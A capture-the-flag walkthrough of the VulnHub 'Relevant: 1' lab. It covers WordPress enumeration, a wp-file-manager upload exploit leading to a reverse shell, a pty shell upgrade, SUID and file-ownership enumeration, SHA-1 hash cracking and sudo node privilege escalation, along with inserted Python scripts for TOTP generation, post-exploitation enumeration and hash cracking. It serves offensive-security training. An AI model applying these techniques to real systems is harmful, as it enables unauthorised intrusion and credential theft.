VulnHub range walkthrough: Relevant: 1
Scan the IP and ports:
First look at port 80 and visit the three websites one by one. Hmm, it looks like they need a VPN to reach (bypassing the Great Firewall). Let's take a look at them!!!
The first one is a video, which I don't understand:
The second one looks like a username and password; keep them for now:
The third one is a QR code. Scanning it gives something that looks like a URL, though I don't know what it is:
otpauth://totp/patsy@relevant?secret=BTVB3SSDD4SZYUV7DXFPBCIFKY&issuer=relevant
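That string is an otpauth Key URI, the format authenticator apps import from a QR code: the type (totp), an account label (patsy@relevant), an issuer, and a base32 secret. Anyone holding that secret can generate the account's 6-digit, 30-second TOTP codes. The script below is an added example, not part of the original writeup: it decodes such a URI and computes the code with only the Python standard library (RFC 4226 HOTP with RFC 6238 time steps). It assumes the Key URI defaults of SHA-1, 6 digits and a 30-second period when those parameters are absent; the function names are my own, and the only value taken from the page is the URI itself.

```python
"""Decode an otpauth://totp/ provisioning URI and compute the TOTP code.

Added example (not from the original writeup). Standard library only:
RFC 4226 HOTP core, RFC 6238 time-based counter. Key URI defaults are
assumed when a parameter is missing: SHA-1, 6 digits, 30-second period.
"""
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit


def parse_otpauth(uri: str) -> dict:
    """Split an otpauth:// URI into type, label, issuer and decoded secret."""
    parts = urlsplit(uri)
    if parts.scheme != "otpauth":
        raise ValueError("not an otpauth URI")
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    secret = params["secret"].strip().replace(" ", "").upper()
    # Key URIs usually omit base32 padding; Python's decoder requires it.
    secret += "=" * (-len(secret) % 8)
    return {
        "type": parts.netloc,  # "totp" or "hotp"
        "label": unquote(parts.path.lstrip("/")),
        "issuer": params.get("issuer"),
        "secret_bytes": base64.b32decode(secret, casefold=True),
        "digits": int(params.get("digits", 6)),
        "period": int(params.get("period", 30)),
        "algorithm": params.get("algorithm", "SHA1").upper(),
    }


def hotp(secret: bytes, counter: int, digits: int = 6, algorithm: str = "SHA1") -> str:
    """RFC 4226: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    digestmod = getattr(hashlib, algorithm.lower().replace("-", ""))
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp_from_uri(uri: str, at: Optional[float] = None) -> str:
    """RFC 6238: the counter is the number of `period`-second steps since the epoch."""
    info = parse_otpauth(uri)
    if info["type"] != "totp":
        raise ValueError("URI is not a TOTP key")
    now = time.time() if at is None else at
    counter = int(now // info["period"])
    return hotp(info["secret_bytes"], counter, info["digits"], info["algorithm"])


# The URI recovered from the QR code on the target (the one value taken from the page).
RANGE_URI = "otpauth://totp/patsy@relevant?secret=BTVB3SSDD4SZYUV7DXFPBCIFKY&issuer=relevant"

if __name__ == "__main__":
    info = parse_otpauth(RANGE_URI)
    print(f"account={info['label']} issuer={info['issuer']} key={info['secret_bytes'].hex()}")
    print("current code:", totp_from_uri(RANGE_URI))
```

Because the counter is derived from wall-clock time, check the target's clock skew before trusting a code; most verifiers accept one step on either side, so generating codes for counter-1 and counter+1 as well is the usual practice.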
OK, there is a lot on the main page. Now scan for directories:
Visiting wp-admin shows that the database connection fails, so WordPress seems to be in use. I started wpscan to enumerate WordPress plugins and found the VM couldn't reach the external network, so I switched to a bridged connection. By the way, VirtualBox really isn't as easy to use as VMware!!!
But wpscan says the service is not running, even though WordPress is definitely there!
Add the --force parameter (which tells wpscan to skip its WordPress-detection check) and scan again:
Now there is something. No plugins were found, but the version came out~~~
I then searched around and found an exploitable vulnerability. You need to supply a token (wpscan only reports known vulnerabilities when given a WPScan API token). The vulnerability had only just been published. The command is as follows:
Visit the link to download the exploit file:
Write the payload.php file, then run the exploit:
Path: ip/wp-content/plugins/wp-file-manager/lib/files/payload.php
Visit it, start a listener, and catch the shell:
Shell:
Get an interactive shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
Next comes the privilege escalation part again. sudo -l shows which commands can be run with sudo; nothing useful here:
Look for SUID binaries: find / -perm -u=s -type f 2>/dev/null
Nothing...
Let's check the users; there are three:
Check which files belong to the user: find / -user h4x0r
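The checks above (sudo -l, the SUID find, files owned by a particular user) can be done in a single pass over the filesystem. The script below is an added example, not from the original writeup: since python3 is present on the target (the pty trick relies on it), it walks the filesystem once and reports setuid/setgid binaries, world-writable files and files owned by a chosen user, pruning /proc, /sys, /dev and /run. The user name h4x0r in the usage line comes from the page; the function names, the skip list and the world-writable check are my additions.

```python
"""One-pass post-exploitation enumeration: sudo rules, setuid/setgid binaries,
world-writable files, and everything owned by a given user.

Added example (not from the original writeup). Python equivalent of
  sudo -l; find / -perm -u=s -type f; find / -user h4x0r
with /proc, /sys, /dev and /run pruned. Run it as the low-privilege shell user:
  python3 enum.py h4x0r
"""
import os
import pwd
import stat
import subprocess
import sys

SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}  # pseudo-filesystems, pure noise


def walk_files(root="/"):
    """Yield (path, lstat) for every entry under root, pruning pseudo-filesystems."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue


def find_suid(root="/"):
    """Regular files with the setuid or setgid bit, like find / -perm -u=s -type f."""
    return sorted(p for p, st in walk_files(root)
                  if stat.S_ISREG(st.st_mode)
                  and st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def find_world_writable(root="/"):
    """Regular files anyone can write; a root cron job or service reading one is a vector."""
    return sorted(p for p, st in walk_files(root)
                  if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH)


def find_owned_by(user, root="/"):
    """Files owned by a user name or numeric uid, like find / -user h4x0r."""
    uid = user if isinstance(user, int) else pwd.getpwnam(user).pw_uid
    return sorted(p for p, st in walk_files(root) if st.st_uid == uid)


def sudo_rules() -> str:
    """Equivalent of sudo -l; -n fails instead of hanging on a password prompt."""
    try:
        r = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired) as exc:
        return f"sudo not usable: {exc}"
    return (r.stdout or r.stderr).strip()


if __name__ == "__main__":
    target_user = sys.argv[1] if len(sys.argv) > 1 else None
    print("[+] sudo -l:\n" + sudo_rules())
    print("[+] setuid/setgid files:", *find_suid(), sep="\n  ")
    print("[+] world-writable files:", *find_world_writable(), sep="\n  ")
    if target_user:
        print(f"[+] files owned by {target_user}:", *find_owned_by(target_user), sep="\n  ")
```

The walk uses lstat and never follows symlinks, so a symlink farm pointing back into / cannot send it into a loop; running the three finds separately, as on the page, walks the disk three times on a VM where each pass is already slow.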
Found a file hidden in a very careless place:
Go in and take a look: it looks like a username and password. Check /etc/passwd, and the user does exist:
I tried cracking it as MD5 and found it was actually SHA-1:
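The detour above (trying MD5 before realising the hash is SHA-1) is avoidable: the length of an unsalted hex digest already narrows the algorithm (32 hex characters for MD5, 40 for SHA-1, 64 for SHA-256, and so on). The script below is an added example, not from the original writeup; it identifies the candidate algorithms from the digest's shape and tries each one against a wordlist. The wordlist and the sample hashes are constructed for the demo (the MD5 and SHA-1 of the word "password"); the real hash from the target is not reproduced here.

```python
"""Identify an unsalted hex hash by its shape, then crack it under every
candidate algorithm instead of guessing MD5 first.

Added example (not from the original writeup). The wordlist and sample
digests below are constructed for the demo.
"""
import hashlib
import re
from typing import Iterable, Optional, Tuple, Union

# Hex digest length -> plausible unsalted algorithms.
HEX_LENGTHS = {
    32: ("md5",),
    40: ("sha1",),
    56: ("sha224",),
    64: ("sha256",),
    96: ("sha384",),
    128: ("sha512",),
}


def identify(digest: str) -> Tuple[str, ...]:
    """Return the candidate algorithms for a hex digest, or () if the shape is unknown."""
    digest = digest.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", digest):
        return ()
    return HEX_LENGTHS.get(len(digest), ())


def crack(digest: str, wordlist: Iterable[Union[str, bytes]]) -> Optional[Tuple[str, str]]:
    """Try every word under every candidate algorithm; return (algorithm, word) or None."""
    digest = digest.strip().lower()
    algos = identify(digest)
    if not algos:
        return None
    for word in wordlist:
        data = word if isinstance(word, bytes) else word.encode()
        for algo in algos:
            if hashlib.new(algo, data).hexdigest() == digest:
                return algo, (data.decode("latin-1") if isinstance(word, bytes) else word)
    return None


def words_from_file(path: str):
    """Stream a wordlist as raw bytes (rockyou.txt is not valid UTF-8 throughout)."""
    with open(path, "rb") as fh:
        for line in fh:
            yield line.rstrip(b"\r\n")


# Constructed wordlist; a real run would use words_from_file("rockyou.txt").
WORDLIST = ["123456", "letmein", "password", "qwerty"]
# Constructed samples: the MD5 and SHA-1 digests of the word "password".
SAMPLE_MD5 = "5f4dcc3b5aa765d61d8327deb882cf99"
SAMPLE_SHA1 = "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8"

if __name__ == "__main__":
    for h in (SAMPLE_MD5, SAMPLE_SHA1):
        print(h, identify(h), crack(h, WORDLIST))
```

The shape check only narrows unsalted digests; a 40-character value could still be, say, a salted SHA-1 from a web application, so when the wordlist run comes up empty the next step is to look at how the application that stored it computes hashes rather than to add more words.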
Got the password of the new user and su'd; ssh didn't seem to connect:
sudo -l to check:
node? What on earth? Go to GTFOBins and look it up:
Execute the command and get root:
Check the flag:
Summary
I gained a lot. First, I learned how to use wpscan: you can't give up just because a scan finds nothing; you have to read the command's manual. Also, learn more about common CVEs. The broader your knowledge, the stronger your attacks. Study hard!!